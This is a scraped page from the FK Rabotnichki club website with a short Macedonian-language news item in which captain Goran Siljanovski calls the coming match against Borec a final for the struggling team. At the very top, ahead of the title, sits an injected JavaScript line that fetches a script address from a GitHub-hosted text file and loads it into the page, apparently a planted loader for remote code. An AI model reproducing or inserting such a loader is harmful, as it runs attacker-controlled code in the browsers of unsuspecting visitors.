;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Силјановски: Мечот со Борец е како финале за нас
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Силјановски: Мечот со Борец е како финале за нас

Работнички нема првенствена победа во последните шест кола, позицијата на табелата не дозволува негативната низа да продолжи, а утрешниот ривал Борец е еден од директните конкуренти за опстанок. Оттаму во редовите на „романтичарите“ има максимална мобилизација, а капитенот Горан Силјановски вели дека мечот е како финале за неговиот тим.

„Сами дозволивме да бидеме во една ваква ситуација и самите треба да се извлечеме. Има квалитет во овој тим на Работнички, но едноставно работите не одат најдобро на резултатски план. Мораме да сториме се за да го добиеме утрешниот меч со Борец. Можам да кажам дека тоа е како финале за нас, бодовите ни се повеќе од потребни. Верувам дека ќе одиграме квалитетно и дека ќе успееме да го совладаме противникот“, вели капитенот на Работнички.

Главен судија на натпреварот Работнички – Борец ќе биде Марјан Гоцевски од Струмица.